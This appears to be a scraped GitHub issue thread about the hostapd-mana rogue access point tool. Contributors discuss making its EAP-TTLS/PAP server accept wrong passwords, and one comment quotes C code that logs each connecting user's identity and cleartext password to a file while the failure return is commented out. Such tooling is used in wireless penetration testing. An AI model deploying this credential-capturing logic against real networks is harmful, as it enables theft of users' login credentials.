Comments (3)
I think it was done way back in 2014, I was spelunking through a212242 to check, but can't obviously see it. I definitely saw it in WPE circa 2015 when comparing the code, but can't remember what I did with it.
from hostapd-mana.
Thanks for your response, from what i understand this needs to be verified still? This return success could also be implemented for WEP. As far as i know this hasnt been implemented by anyone else before. Hostapd-mana is the goto tool for this stuff, so happy to see it getting better and better.
Update:
Looking at some of the code (and forgive me if i'm wrong) it seems that the status SUCCESS is returned because returning FAILURE is commented out. Didn't check in other places yet. You perhaps remember doing it this way?
src/eap_server/eap_server_ttls.c
if (sm->user->password_len != user_password_len ||
os_memcmp_const(sm->user->password, user_password,
user_password_len) != 0) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password: %s", user_password);
//thanks gcp
char *ennode = getenv("MANANODE");
FILE *f = fopen(ennode, "a");
if (f != NULL) {
const char *hdr = "PAP";
fprintf(f, "%s|%*.*s|%s\n", hdr, 0, sm->identity_len, sm->identity, user_password);
fclose(f);
}
//eap_ttls_state(data, FAILURE);
//return;
}
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Correct user password");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
Other function i saw still had FAILURE returned:
} else {
wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Invalid user password");
eap_ttls_state(data, FAILURE);
}
from hostapd-mana.
Just did some testing and it wasn't working. Added 11c121e to fix it. Will do it for the other EAP types as I refactor the WPE code in the next few days.
from hostapd-mana.
Related Issues (20)
- Feature request - PEAP/MSCHAPv2 MITM (relaying) HOT 2
- error when using 'make -C hostapd-mana' HOT 2
- Stuck in 'obtaining ip address' when trying to connect to the AP HOT 1
- libssl.so.1.0.0 Not Found HOT 4
- Multiple BSS with Hostapd HOT 3
- [WPA-EAP] client cannot join EAPOL TX: Message too long HOT 1
- client connected but hash not captured HOT 2
- is this possible !!!!!!!!!!!!!!!!?????
- no_probe_resp_if_max_sta = 0 not working
- Feature request: Logging EAP Identity
- ACL Bug: MAC Address Bitmasks Ignored After VLAN ID
- ACL Bug: Bitmasks Break Binary Search
- Segmentation fault using with sycophant HOT 11
- Berate_ap gets stuck on internet sharing method nat. No ap created, kali nethunter
- WPA/2 Pre-shared Key (PSK) Networks HOT 1
- Python 3 support?
- Error Handling Directed Probes HOT 1
- ld returned 1 exit status HOT 3
- . HOT 2
- .
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from hostapd-mana.